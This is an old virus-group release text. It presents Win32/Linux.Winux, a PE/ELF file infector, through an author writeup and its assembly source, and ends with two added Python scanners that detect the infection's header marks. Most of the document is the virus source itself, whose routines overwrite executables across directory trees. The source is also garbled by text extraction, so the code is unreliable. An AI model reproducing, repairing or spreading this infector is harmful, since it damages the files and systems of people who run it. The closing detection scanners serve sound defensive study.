Win32.Winux.txt  Wed Nov 21 13:30:00 2001

+-----------------------+
: Win32/Linux.Winux     :
+--+----------------+---+
   : by Benny/29A   :
   +----------------+




Heya ppl, lemme introduce you my first multi-platform virus, the world's first PE/ELF infector.

The idea of the first Win32/Linux virus came to my head when I was learning Linux viruses. I'm not a Linux expert, I couldn't code for Linux in assembler - I am familiar with Intel syntax, AT&T is a bit chaotic for me. However, I decided to learn more about Linux coding and left my place of newbee. I was always fascinated by the Linux scene and low-level programming under Linux, but I never knew much about it. I wanted to code a virus for Linux and learn from it. But becoz there already exist some viruses and I knew I wouldn't be able to bring any new technique, I decided to code something unique -> a Win32/Linux compatible multi-platform infector. And here you can find the result of my trying. Now, after all, I've got some valuable experiencez and I'm glad for that. Coding/debugging in Linux was hard for me, but I had fun and I learned a lot. And that's the most important.

- Technical details -

The virus itself ain't much. It's not big, it's not complicated, it's not resident nor polymorphic.. I wanted the virus to be like this. Just to show something new, show that something never seen before is possible and how it can be coded.

The virus is devided into two partz: the Win32 part and the Linux part. Every part is able to infect both PE and ELF filez. This source is designed to be compiled by TASM under Win32; nevertheless it can infect Linux programz, and so then it will be able to be executed in the Linux environment (and there it is also able to infect the Win32 part, which can be executed in the Win32 environment etc etc etc...).

Win32 part:
------------

The virus infects PE filez by overwriting the .reloc section, so it does not enlarge the host file size. Filez that don't have a .reloc section big enough for the virus code can't be infected (explorer.exe can be used to test infection capabilities). It can pass thru the directory tree by the well known "dotdot" method ("cd ..") and there infects all PE and ELF filez - the virus does not check extensionz, it analyses the victim's internal format and then decidez whata do. When all filez are passed and/or infected the virus will execute the host code.

Linux part:
------------

The virus infects ELF filez by overwriting the host code with viral code. The original host code is stored at the end of the host file. It can infect all filez (both PE and ELF) in the current directory, also without checking file extensionz. When all filez are passed and/or infected the virus will restore the host code (overwrite itself with the original host code) and execute it.

Well, you are probably asking how it is possible that the virus can infect Win32 appz from the Linux environment and Linux appz from the Win32 environment. Yeah, many ppl already asked me. For instance, under some emulator. There exist some emulatorz (win4lin, wine etc..) which are often used to execute Win32 appz under Linux. Also, I know many ppl that have a partition specially reserved for CD burning, where they store both Win32 and Linux programz. A virus executed from there has no problemz with infection, heh :)

Does this virus work? Heh, sure it does. I tested it on Win98, Win2000 and RedHat 7.0, and it worked without any problemz. However, if you find any problemz, don't be shy and send me a bug report :-P

- Licence agreement -

This virus is covered by the GPL - GNU General Public Licence. All crucial facts can be found there. Read it before using!

- Last notez -

While I was finishing Universe and coding Winux, many personal thingz happened to me. Again such a depressive season as only winter can be fell down on me.. I'm finishing my high-school, last year, many examz (and I know nothing, you know that feeling, heh :) etc. The end of the next stage of my life is getting closer and I don't know how the next one will be for me, what it will take and bring to me. I'm looking forward to summer, the best season in the year, no depression, no school, no fucking problemz I still have and can't hold them all..

c ya l8r, somewhere in timespace..

+-------------+
: Benny / 29A +-----------------------------+
: benny@post.cz                             :
+---------+ (c) March, 2001                 :
          : http://benny29a.cjb.net         :
          : Czech Republic                  :
          +---------------------------------+

.386p.model flat include win32api.inc include useful.inc include mz.inc include pe.inc.data db?.code Start: ad @SEH_SetupFrame setup SEH frame call gdelta gdelta: pop ebp ebp=delta offset call get_base get K32 base address call get_apis find addresses of APIz lea call f_infect: eax,[ebp + prev_dir - gdelta] eax MAX_PATH [ebp + a_getcurrentdirectorya - gdelta] get current directory 20 pop ecx 20 passes in directory tree ecx

Win32.Winux.txt Wed Nov 21 13:30:00 2001 3 direct action - infect all PE filez in directory lea esi,[ebp + WFD - gdelta] WIN32_FIND_DATA structure esi save its address @sz *.* search for all filez call [ebp + a_findfirstfilea - gdelta] find first file inc eax je e_find quit if not found dec eax eax save search handle to stack f_next: call wcheckinfect infect found file esi save WFD structure dword ptr [esp+4] and search handle from stack call [ebp + a_findnextfilea - gdelta]find next file test eax,eax jne f_next and infect it f_close:call [ebp + a_findclose - gdelta] close search handle e_find: @sz.. mov esi,[ebp + a_setcurrentdirectorya - gdelta] call esi go upper in directory tree pop ecx loop f_infect and again.. lea eax,[ebp + prev_dir - gdelta] eax call esi go back to original directory end_host: @SEH_RemoveFrame remove SEH frame extrn ExitProcess mov eax,offset ExitProcess-400000h original_ep = dword ptr $-4 add eax,400000h image_base = dword ptr $-4 jmp eax and go back to host program INFECT FILE (Win32 version) wcheckinfect Proc ad @SEH_SetupFrame setup SEH frame and dword ptr [ebp + sucelf - gdelta],0 test [esi.wfd_dwfileattributes], FILE_ATTRIBUTE_DIRECTORY jne end_seh discard directory entries xor ecx,ecx cmp [esi.wfd_nfilesizehigh],ecx jne end_seh discard files >4GB mov eax,[esi.wfd_nfilesizelow] cmp eax,4000h jb end_seh discard small filez mov [ebp + l_lseek - gdelta],eax xor lea call inc eax,eax eax FILE_ATTRIBUTE_NORMAL OPEN_EXISTING eax eax GENERIC_READ or GENERIC_WRITE eax,[esi.wfd_szfilename] eax [ebp + a_createfilea - gdelta] open file eax

Win32.Winux.txt Wed Nov 21 13:30:00 2001 4 je end_seh dec eax mov [ebp + hfile - gdelta],eax cdq call cdq xchg jecxz mov edx edx edx PAGE_READWRITE edx eax [ebp + a_createfilemappinga - gdelta] eax,ecx end_cfma [ebp + hmapfile - gdelta],ecx edx edx edx FILE_MAP_WRITE ecx map file to address space call [ebp + a_mapviewoffile - gdelta] xchg eax,ecx jecxz end_mvof mov [ebp + lpfile - gdelta],ecx jmp n_fileopen close_file: 12345678h lpfile = dword ptr $-4 unmap file call [ebp + a_unmapviewoffile - gdelta] end_mvof: 12345678h hmapfile = dword ptr $-4 call [ebp + a_closehandle - gdelta] end_cfma: mov ecx,12345678h was it linux program (ELF)? sucelf = dword ptr $-4 jecxz c_close no, close that file 2 0 0 call dword ptr [ebp + hfile - gdelta] [ebp + a_setfilepointer - gdelta] go to EOF 0 lea eax,[ebp + sucelf - gdelta] eax virtual_end-start 12345678h a_mem = dword ptr $-4 dword ptr [ebp + hfile - gdelta] call [ebp + a_writefile - gdelta] write there orig. program part MEM_RELEASE 0 dword ptr [ebp + a_mem - gdelta] call [ebp + a_virtualfree - gdelta] and deallocate used memory c_close: 12345678h hfile = dword ptr $-4 call [ebp + a_closehandle - gdelta] close file jmp end_seh and quit n_fileopen: call check_elf

Win32.Winux.txt Wed Nov 21 13:30:00 2001 5 je winfectelf is it Linux program (ELF)? add ax,-image_dos_signature jne close_file call check_pe jne close_file is it Win32 program (PE)? important chex cmp word ptr [esi.nt_fileheader.fh_machine],image_file_machine_i386 jne close_file mov ax,[esi.nt_fileheader.fh_characteristics] test ax,image_file_executable_image je close_file test ax,image_file_dll jne close_file test ax,image_file_system jne close_file mov al,byte ptr [esi.nt_fileheader.oh_subsystem] test al,image_subsystem_native jne close_file movzx eax,word ptr [esi.nt_fileheader.fh_numberofsections] dec eax test eax,eax je close_file call header&relocs get PE headerz and check for relocs je close_file quit if no relocs mov ebx,[edi.sh_virtualaddress] cmp eax,ebx jne close_file cmp [edi.sh_sizeofrawdata],virus_end-start+500 jb close_file is it large enough? ad xor mov stosd stosd eax,eax edi,edx erase relocs record call set_alignz align section variable dword ptr [ebp + original_ep - gdelta] dword ptr [ebp + image_base - gdelta] save used variablez mov eax,[esi.nt_optionalheader.oh_addressofentrypoint] mov [esi.nt_optionalheader.oh_addressofentrypoint],ebx mov [ebp + original_ep - gdelta],eax mov eax,[esi.nt_optionalheader.oh_imagebase] mov [ebp + image_base - gdelta],eax set variablez ad mov edi,[edi.sh_pointertorawdata] add edi,[ebp + lpfile - gdelta] lea esi,[ebp + Start - gdelta] mov ecx,virus_end-start rep movsb overwrite relocs by virus body pop dword ptr [ebp + image_base - gdelta] pop dword ptr [ebp + original_ep - gdelta] restore used variablez or dword ptr [edi.sh_characteristics],image_scn_mem_write jmp close_file set flag and quit wcheckinfect EndP INFECT LINUX PROGRAM (Win32 version) winfectelf Proc mov edi,ecx movzx eax,word ptr [edi+12h] cmp eax,3

Win32.Winux.txt Wed Nov 21 13:30:00 2001 6 jne close_file call get_elf get elf headerz p_sectionz: mov eax,[esi+0ch] virtual address add eax,[esi+14h] virtual size cmp ebx,eax jb got_section does EP fit to this section? add esi,edx no, get to next record loop p_sectionz ECX-timez jmp close_file invalid ELF, quit got_section: mov eax,[ebp + Start - gdelta] mov ecx,[esi+10h] add ecx,edi cmp [ecx],eax je close_file infection check mov eax,[esi+14h] cmp eax,virtual_end-start jb close_file must be large enough PAGE_READWRITE MEM_RESERVE or MEM_COMMIT eax 0 call [ebp + a_virtualalloc - gdelta] test eax,eax allocate buffer for host code je close_file mov [ebp + a_mem - gdelta],eax ad mov ecx,[esi+14h] mov esi,[esi+10h] add esi,edi esi xchg eax,edi rep movsb copy host code to our buffer pop edi lea esi,[ebp + Start - gdelta] mov ecx,virtual_end-start rep movsb overwrite host code by virus body add dword ptr [edi+18h],linuxstart-start mov [ebp + sucelf - gdelta],edi jmp close_file set semaphore and quit winfectelf EndP this procedure can rieve API addresses get_apis Proc ad @SEH_SetupFrame lea esi,[ebp + crc32s - gdelta] get ptr to CRC32 values of APIs lea edi,[ebp + a_apis - gdelta] where to store API addresses crc32c how many APIs do we need pop ecx in ECX... g_apis: eax save K32 base call get_api stosd save address test eax,eax je q_gpa quit if not found add esi,4 move to next CRC32 value loop g_apis search for API addresses in a loop end_seh:@seh_removeframe remove SEH frame

Win32.Winux.txt Wed Nov 21 13:30:00 2001 7 restore all registers and quit from procedure q_gpa: @SEH_RemoveFrame jmp end_host quit if error get_apis EndP this procedure can rieve address of given API get_api Proc ad store all registers @SEH_SetupFrame setup SEH frame mov edi,[eax.mz_lfanew] move to PE header add edi,eax... mov ecx,[edi.nt_optionalheader.oh_directoryentries.de_export.dd_size] jecxz end_gpa quit if no exports mov ebx,eax add ebx,[edi.nt_optionalheader.oh_directoryentries.de_export.dd_virtualaddres s] mov edx,eax get address of export table add edx,[ebx.ed_addressofnames] address of API names mov ecx,[ebx.ed_numberofnames] number of API names mov edi,edx dword ptr [esi] save CRC32 to stack mov ebp,eax xor eax,eax APIname: eax mov esi,ebp get base add esi,[edx+eax*4] move to API name esi save address @endsz go to the end of string sub esi,[esp] get string size mov edi,esi move it to EDI pop esi restore address of API name call CRC32 calculate CRC32 of API name cmp eax,[esp+4] is it right API? je g_name yeah, we got it inc eax increment counter loop APIname and search for next API name end_gpa:xor eax, eax set flag ok_gpa: @SEH_RemoveFrame remove SEH frame mov [esp.pushad_eax],eax save value to stack restore all registers quit from procedure g_name: pop edx mov edx,ebp add edx,[ebx.ed_addressofordinals] movzx eax,word ptr [edx+eax*2] cmp eax,[ebx.ed_numberoffunctions] jae end_gpa-1 mov edx,ebp base of K32 add edx,[ebx.ed_addressoffunctions] address of API functions add ebp,[edx+eax*4] get API function address xchg eax,ebp we got address of API in EAX jmp ok_gpa quit get_api EndP this procedure can rieve base address of K32 get_base Proc ebp store EBP call gdlt get delta offset gdlt: pop ebp to EBP mov eax,12345678h get lastly used address last_kern = dword ptr $-4 call check_kern is this address valid?

Win32.Winux.txt Wed Nov 21 13:30:00 2001 8 jecxz end_gb yeah, we got the address call gb_table jump over the address table dd 077E00000h NT/W2k dd 077E80000h NT/W2k dd 077ED0000h NT/W2k dd 077F00000h NT/W2k dd 0BFF70000h 95/98 gb_table: pop edi get pointer to address table 4 get number of items in the table pop esi to ESI gbloop: mov eax,[edi+esi*4] get item call check_kern is address valid? jecxz end_gb yeah, we got the valid address dec esi decrement ESI test esi,esi end of table? jne gbloop nope, try next item call scan_kern scan the address space for K32 end_gb: pop ebp restore EBP quit check_kern: check if K32 address is valid mov ecx,eax make ECX!= 0 ad store all registers @SEH_SetupFrame setup SEH frame movzx edx,word ptr [eax] get two bytes add edx,-"zm" is it MZ header? jne end_ck nope mov ebx,[eax.mz_lfanew] get pointer to PE header add ebx,eax normalize it mov ebx,[ebx] get four bytes add ebx,-"ep" is it PE header? jne end_ck nope xor ecx,ecx we got K32 base address mov [ebp + last_kern - gdlt],eax save K32 base address end_ck: @SEH_RemoveFrame remove SEH frame mov [esp.pushad_ecx],ecx save ECX restore all registers if ECX == 0, address was found SEH_hndlr macro macro for SEH @SEH_RemoveFrame remove SEH frame restore all registers add dword ptr [ebp + baddr - gdlt],1000h explore next page jmp bck continue execution endm scan_kern: scan address space for K32 bck: ad store all registers @SEH_SetupFrame setup SEH frame mov eax,077000000h starting/last address baddr = dword ptr $-4 movzx edx,word ptr [eax] get two bytes add edx,-"zm" is it MZ header? jne pg_flt nope mov edi,[eax.mz_lfanew] get pointer to PE header add edi,eax normalize it mov ebx,[edi] get four bytes add ebx,-"ep" is it PE header? jne pg_flt nope mov ebx,eax mov esi,eax add ebx,[edi.nt_optionalheader.oh_directoryentries.de_export.dd_virtualaddres s] add esi,[ebx.ed_name] mov esi,[esi] add esi,- NREK je end_sk

Win32.Winux.txt Wed Nov 21 13:30:00 2001 9 pg_flt: xor ecx,ecx we got K32 base address mov [ecx],esi generate PAGE FAULT! search again... end_sk: mov [ebp + last_kern - gdlt],eax save K32 base address @SEH_RemoveFrame remove SEH frame mov [esp.pushad_eax],eax save EAX - K32 base get_base EndP restore all registers CRC32: ecx procedure for calculating CRC32s edx at run-time ebx xor ecx,ecx dec ecx mov edx,ecx NextByteCRC: xor eax,eax xor ebx,ebx lodsb xor al,cl mov cl,ch mov ch,dl mov dl,dh mov dh,8 NextBitCRC: shr bx,1 rcr ax,1 jnc NoCRC xor ax,08320h xor bx,0edb8h NoCRC: dec dh jnz NextBitCRC xor ecx,eax xor edx,ebx dec edi jne NextByteCRC not edx not ecx pop ebx mov eax,edx rol eax,16 mov ax,cx pop edx pop ecx signature db 0, [Win32/Linux.Winux] multi-platform virus by Benny/29A,0 little signature of mine -) Viral entrypoint in Linux programz LinuxStart: eax reserve variable for urn to host ad mov ebx,[esp.cpushad+8] get command line call lgdelta lgdelta:pop ebp ebp=delta offset mov ecx,end_end_lhost-end_lhost sub esp,ecx mov edi,esp lea esi,[ebp + end_lhost - lgdelta] rep movsb copy virus to stack and jump there jmp esp (becoz we need to restore host code back) end_lhost Proc ebx 125

Win32.Winux.txt Wed Nov 21 13:30:00 2001 10 lea ebx,[ebp + Start - lgdelta] and ebx,0fffff000h mov ecx,3000h mov edx,7 int 80h deprotect code section pop ebx 5 xor ecx,ecx int 80h open host file xchg eax,ebx test ebx,ebx jns read_host q_host: xor eax,eax inc eax -1 pop ebx int 80h quit if error read_host: 19 mov ecx,12345678h l_lseek = dword ptr $-4 cdq int 80h seek to saved host code (EOF - some bytez) test eax,eax js q_host ad 5 call cur_dir db.,0 cur_dir:pop ebx xor ecx,ecx cdq int 80h get current directory descriptor xchg eax,ebx inf_dir: 89 lea ecx,[ebp + WFD - lgdelta] int 80h get file from directory xchg eax,ecx jecxz cldir no more filez.. add eax,10 call lcheckinfect try to infect it jmp inf_dir and look for another file cldir: 6 int 80h close directory descriptor 3 lea ecx,[ebp + Start - lgdelta] mov edi,ecx mov edx,virtual_end-start int 80h restore host code test eax,eax js q_host 6 int 80h close host file descriptor add esp,end_end_lhost-end_lhost mov [esp.cpushad],edi write host entrypoint address

Win32.Winux.txt Wed Nov 21 13:30:00 2001 11 and jump to there INFECT FILE (Linux version) lcheckinfect Proc ad xchg eax,ebx 5 cdq inc edx inc edx mov ecx,edx int 80h open file xchg eax,ebx test ebx,ebx jns c_open c_open: mov [ebp + f_handle - lgdelta],ebx 19 xor ecx,ecx int 80h seek to EOF = get file size mov [ebp + l_lseek - lgdelta],eax save it ecx ebx inc ecx ecx inc ecx inc ecx ecx eax xor ecx,ecx ecx mov ebx,esp 90 int 80h map file to address space add esp,24 cmp eax,0fffff000h jbe c_mmap quit if error jmp c_file c_mmap: mov ecx,eax mov [ebp + fm_handle - lgdelta],eax ad call check_elf je linfectelf is it Linux program (ELF)? add ax,-image_dos_signature jne c_mfile call check_pe jne c_mfile is it Win32 program (PE)? some important chex cmp word ptr [esi.nt_fileheader.fh_machine],image_file_machine_i386 jne c_mfile mov ax,[esi.nt_fileheader.fh_characteristics] test ax,image_file_executable_image je c_mfile test ax,image_file_dll jne c_mfile test ax,image_file_system jne c_mfile mov al,byte ptr [esi.nt_fileheader.oh_subsystem] test al,image_subsystem_native jne c_mfile

Win32.Winux.txt Wed Nov 21 13:30:00 2001 12 movzx eax,word ptr [esi.nt_fileheader.fh_numberofsections] dec eax test eax,eax je c_mfile call header&relocs get PE headerz and check for relocs je c_mfile quit if no relocs mov ebx,[edi.sh_virtualaddress] cmp eax,ebx jne c_mfile cmp [edi.sh_sizeofrawdata],virus_end-start+500 jb c_mfile is it large enough? ad xor mov stosd stosd eax,eax edi,edx clear relocs record call set_alignz align section variable mov eax,[esi.nt_optionalheader.oh_addressofentrypoint] mov [esi.nt_optionalheader.oh_addressofentrypoint],ebx mov [ebp + original_ep - lgdelta],eax mov eax,[esi.nt_optionalheader.oh_imagebase] mov [ebp + image_base - lgdelta],eax set some important variablez ad mov edi,[edi.sh_pointertorawdata] add edi,[esp+24] lea esi,[ebp + Start - lgdelta] mov ecx,virus_end-start rep movsb overwrite relocs by virus code or dword ptr [edi.sh_characteristics],image_scn_mem_write set flag c_mfile: 91 int 80h unmap file c_file: 6 mov ebx,[ebp + f_handle - lgdelta] int 80h close file descriptor and quit lcheckinfect EndP INFECT LINUX PROGRAM (Linux version) linfectelf Proc mov edi,ecx movzx eax,word ptr [edi+12h] cmp eax,3 jne c_mfile call get_elf get ELF headerz p_sectionz2: mov eax,[esi+0ch] virtual address add eax,[esi+14h] virtual size cmp ebx,eax jb got_section2 does EP fit to this section? add esi,edx no, get to next record loop p_sectionz2 ECX-timez jmp c_mfile invalid ELF, quit got_section2: mov eax,[ebp + Start - lgdelta]

Win32.Winux.txt Wed Nov 21 13:30:00 2001 13 mov ecx,[esi+10h] add ecx,edi cmp [ecx],eax je c_mfile infection check mov eax,[esi+14h] cmp eax,virtual_end-start jb c_mfile is it large enough? sub esp,eax create buffer in stack mov [ebp + s_mem - lgdelta],eax add dword ptr [edi+18h],linuxstart-start mov ecx,[esi+14h] mov esi,[esi+10h] add esi,edi mov eax,esi mov edi,esp rep movsb copy original host code there mov edi,eax lea esi,[ebp + Start - lgdelta] mov ecx,virtual_end-start rep movsb overwrite host code by virus 91 mov ebx,[ebp + fm_handle - lgdelta] int 80h unmap file 19 mov ebx,[ebp + f_handle - lgdelta] xor ecx,ecx cdq inc edx inc edx int 80h go to EOF 4 mov ecx,esp mov edx,virtual_end-start int 80h write there original host code add esp,[ebp + s_mem - lgdelta] correct stack jmp c_file and close the file linfectelf EndP check if it is Linux program (ELF) check_elf Proc mov eax,[ecx] eax add eax,-464c457fh check_elf EndP check if it is Win32 program (PE) check_pe Proc mov eax,[ecx.mz_lfanew] add eax,ecx xchg eax,esi mov eax,[esi] add eax,-image_nt_signature check_pe EndP

Win32.Winux.txt Wed Nov 21 13:30:00 2001 14 get some variablez and check for relocationz in PE file header&relocs Proc imul eax,eax,image_sizeof_section_header movzx edx,word ptr [esi.nt_fileheader.fh_sizeofoptionalheader] lea edi,[eax+edx+image_sizeof_file_header+4] add edi,esi lea edx,[esi.nt_optionalheader.oh_datadirectory.de_basereloc.dd_virtualaddres s] mov eax,[edx] test eax,eax header&relocs EndP align section variable set_alignz Proc mov eax,virtual_end-start cmp eax,[edi.sh_virtualsize] jb o_vs mov ecx,[esi.nt_optionalheader.oh_sectionalignment] cdq div ecx test edx,edx je o_al inc eax o_al: mul ecx mov [edi.sh_virtualsize],eax o_vs: set_alignz EndP get some important variablez from Linux program (ELF) get_elf Proc mov ebx,[edi+18h] EP mov esi,[edi+20h] section header add esi,edi normalize movzx edx,word ptr [edi+2eh] size of section header movzx ecx,word ptr [edi+30h] number of sectionz get_elf EndP end_end_lhost: end_lhost EndP gpl db This GNU program is covered by GPL.,0 licence agreement -) CRC32s of used APIz crc32s: dd 0AE17EBEFh FindFirstFileA dd 0AA700106h FindNextFileA dd 0C200BE21h FindClose dd 08C892DDFh CreateFileA dd 096B2D96Ch CreateFileMappingA dd 0797B49ECh MapViewOfFile dd 094524B42h UnmapViewOfFile dd 068624A9Dh CloseHandle dd 04402890Eh VirtualAlloc dd 02AAD1211h VirtualFree dd 021777793h WriteFile dd 085859D42h SetFilePointer dd 0EBC6C18Bh GetCurrentDirectoryA dd 0B2DBD7DCh SetCurrentDirectoryA dd 07495B3ADh OutputDebugStringA crc32c = ($-crc32s)/4 number of APIz virus_end:

Win32.Winux.txt Wed Nov 21 13:30:00 2001 15 addresses of APIz a_apis: a_findfirstfilea dd? a_findnextfilea dd? a_findclose dd? a_createfilea dd? a_createfilemappinga dd? a_mapviewoffile dd? a_unmapviewoffile dd? a_closehandle dd? a_virtualalloc dd? a_virtualfree dd? a_writefile dd? a_setfilepointer dd? a_getcurrentdirectorya dd? a_setcurrentdirectorya dd? a_outputdebugstringa dd? f_handle dd? file handle fm_handle dd? file mapping handle s_mem dd? size of host code (for stack manipulatio nz) WFD WIN32_FIND_DATA? WIN32_FIND_DATA structure prev_dir db MAX_PATH dup (?)original directory virtual_end: ends End Start that s all folx, wasn t that kewl? -)
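The Win32 part described in the writeup leaves three header-level marks on an infected PE: the entry point is redirected to the virtual address of .reloc, the .reloc section gets IMAGE_SCN_MEM_WRITE ORed into its characteristics, and the base-relocation data directory entry is zeroed while the section itself stays in the section table. Together with the "[Win32/Linux.Winux]" marker string the body carries, those make a usable triage heuristic. The Python scanner below is an added example written for this page, not code from Benny's source; it parses only PE32 (the i386 images the virus targets), uses a two-section image constructed inline as sample input (not a real program), and the function and constant names are the example's own.

```python
import struct

IMAGE_SCN_MEM_WRITE = 0x80000000    # section flag the virus ORs into .reloc
DIR_BASERELOC = 5                   # data directory index the virus zeroes
SIGNATURE = b"[Win32/Linux.Winux]"  # marker string carried in the virus body

def parse_pe(data):
    """Return (optional header offset, section list) for a PE32 file, else None."""
    try:
        if data[:2] != b"MZ":
            return None
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            return None
        fh = e_lfanew + 4
        nsec = struct.unpack_from("<H", data, fh + 2)[0]        # NumberOfSections
        opt_size = struct.unpack_from("<H", data, fh + 16)[0]   # SizeOfOptionalHeader
        opt = fh + 20
        sections = []
        for i in range(nsec):
            off = opt + opt_size + i * 40
            name, vsize, va, raw, rawptr = struct.unpack_from("<8sIIII", data, off)
            chars = struct.unpack_from("<I", data, off + 36)[0]
            sections.append({"name": name.rstrip(b"\0"), "va": va, "vsize": vsize,
                             "raw": raw, "rawptr": rawptr, "chars": chars})
        return opt, sections
    except struct.error:
        return None

def scan_pe(data):
    """Flag the header marks a Winux-style .reloc overwrite leaves behind."""
    parsed = parse_pe(data)
    if parsed is None:
        return ["not a PE file"]
    opt, sections = parsed
    ep = struct.unpack_from("<I", data, opt + 16)[0]          # AddressOfEntryPoint
    reloc_rva, reloc_size = struct.unpack_from("<II", data, opt + 96 + DIR_BASERELOC * 8)
    findings = []
    for s in sections:
        if s["name"] != b".reloc":
            continue
        if s["va"] <= ep < s["va"] + max(s["vsize"], s["raw"]):
            findings.append("entry point inside .reloc")
        if s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append(".reloc section is writable")
        if reloc_rva == 0 and reloc_size == 0:
            findings.append("base relocation directory zeroed but .reloc section present")
        if SIGNATURE in data[s["rawptr"]:s["rawptr"] + s["raw"]]:
            findings.append("Winux signature string in .reloc")
    return findings

def build_pe_sample(infected):
    """Constructed two-section PE32 image (.text + .reloc); not a real program."""
    text_va, reloc_va, text_ptr, reloc_ptr = 0x1000, 0x2000, 0x200, 0x400
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                       # e_lfanew
    fh = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x102)  # i386, 2 sections, EXE
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                         # PE32 magic
    struct.pack_into("<I", opt, 16, reloc_va if infected else text_va)
    struct.pack_into("<I", opt, 28, 0x400000)                     # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)               # section / file alignment
    struct.pack_into("<I", opt, 92, 16)                           # NumberOfRvaAndSizes
    if not infected:                                              # the infected copy has it zeroed
        struct.pack_into("<II", opt, 96 + DIR_BASERELOC * 8, reloc_va, 0x100)
    def sec(name, va, ptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, 0x200, va, 0x200, ptr, 0, 0, 0, 0, chars)
    reloc_chars = 0x42000040 | (IMAGE_SCN_MEM_WRITE if infected else 0)
    image = bytearray(0x600)
    image[:0x40] = dos
    image[0x40:0x44] = b"PE\0\0"
    image[0x44:0x58] = fh
    image[0x58:0x138] = opt
    image[0x138:0x188] = (sec(b".text", text_va, text_ptr, 0x60000020) +
                          sec(b".reloc", reloc_va, reloc_ptr, reloc_chars))
    if infected:
        image[reloc_ptr:reloc_ptr + len(SIGNATURE)] = SIGNATURE
    return bytes(image)

if __name__ == "__main__":
    for label in ("clean", "infected"):
        print(label, scan_pe(build_pe_sample(label == "infected")))
```

The first three checks are structural and survive a changed marker string; a writable .reloc whose start is the entry point has no legitimate reason to exist in a linker-produced image, so any one of them is worth a closer look, and all three together are a strong signal.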
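The Linux part described in the writeup overwrites the host code in the section that holds the entry point and stores the displaced original code at the end of the file, so an infected ELF carries bytes past everything its section header table describes, and the marker string sits at the start of the entry-point section. The scanner below is an added example written for this page, not code from the source above; it handles ELF32 only (the page checks e_machine == 3), computes the end of the last described section or header table and reports any trailing overlay, and uses a one-section image constructed inline (not a real binary) as sample input. Function and constant names are the example's own.

```python
import struct

SHT_NOBITS = 8                      # .bss-style sections occupy no file bytes
SIGNATURE = b"[Win32/Linux.Winux]"  # marker string carried in the virus body

def parse_elf32(data):
    """Return (e_entry, e_shoff, shentsize, shnum, sections) for an ELF32 file, else None."""
    try:
        if data[:4] != b"\x7fELF" or data[4] != 1:      # EI_CLASS 1 = 32-bit
            return None
        e_entry = struct.unpack_from("<I", data, 0x18)[0]
        e_shoff = struct.unpack_from("<I", data, 0x20)[0]
        shentsize, shnum = struct.unpack_from("<HH", data, 0x2E)
        sections = []
        for i in range(shnum):
            off = e_shoff + i * shentsize
            # sh_type, sh_flags, sh_addr, sh_offset, sh_size follow sh_name
            sh_type, _flags, addr, offset, size = struct.unpack_from("<IIIII", data, off + 4)
            sections.append({"type": sh_type, "addr": addr, "offset": offset, "size": size})
        return e_entry, e_shoff, shentsize, shnum, sections
    except struct.error:
        return None

def scan_elf(data):
    """Report trailing overlay data and the marker string in the entry-point section."""
    parsed = parse_elf32(data)
    if parsed is None:
        return ["not an ELF32 file"]
    e_entry, e_shoff, shentsize, shnum, sections = parsed
    described_end = e_shoff + shnum * shentsize
    for s in sections:
        if s["type"] != SHT_NOBITS:
            described_end = max(described_end, s["offset"] + s["size"])
    findings = []
    overlay = len(data) - described_end
    if overlay > 0:
        findings.append(f"{overlay} bytes of data beyond the last described section")
    for s in sections:
        if s["type"] != SHT_NOBITS and s["addr"] <= e_entry < s["addr"] + s["size"]:
            if SIGNATURE in data[s["offset"]:s["offset"] + s["size"]]:
                findings.append("Winux signature string in entry-point section")
    return findings

def build_elf_sample(infected):
    """Constructed ELF32 image with a null section and one .text section; not a real program."""
    text_off, text_size, text_addr = 0x60, 0x100, 0x08048060
    shoff = text_off + text_size                            # section headers follow .text
    ehdr = bytearray(52)
    ehdr[:7] = b"\x7fELF\x01\x01\x01"                       # ELF32, little-endian, version 1
    struct.pack_into("<HHI", ehdr, 0x10, 2, 3, 1)           # ET_EXEC, EM_386, EV_CURRENT
    struct.pack_into("<I", ehdr, 0x18, text_addr)           # e_entry
    struct.pack_into("<I", ehdr, 0x20, shoff)               # e_shoff
    struct.pack_into("<HHHHHH", ehdr, 0x28, 52, 32, 0, 40, 2, 0)  # ehsize..shstrndx
    text = bytearray(text_size)
    if infected:
        text[:len(SIGNATURE)] = SIGNATURE                   # virus body now starts the section
    null_sh = bytes(40)
    text_sh = struct.pack("<IIIIIIIIII", 1, 1, 6, text_addr, text_off, text_size, 0, 0, 16, 0)
    image = bytes(ehdr) + bytes(text_off - 52) + bytes(text) + null_sh + text_sh
    if infected:
        image += bytes(0x80)                                # stand-in for the displaced host code at EOF
    return image

if __name__ == "__main__":
    for label in ("clean", "infected"):
        print(label, scan_elf(build_elf_sample(label == "infected")))
```

Trailing data on its own is not proof of infection (some toolchains and installers append payloads legitimately), but a stripped binary with an overlay roughly the size of its entry-point section, plus a recognisable string at that section's start, matches the layout the writeup describes and is worth quarantining for a closer look.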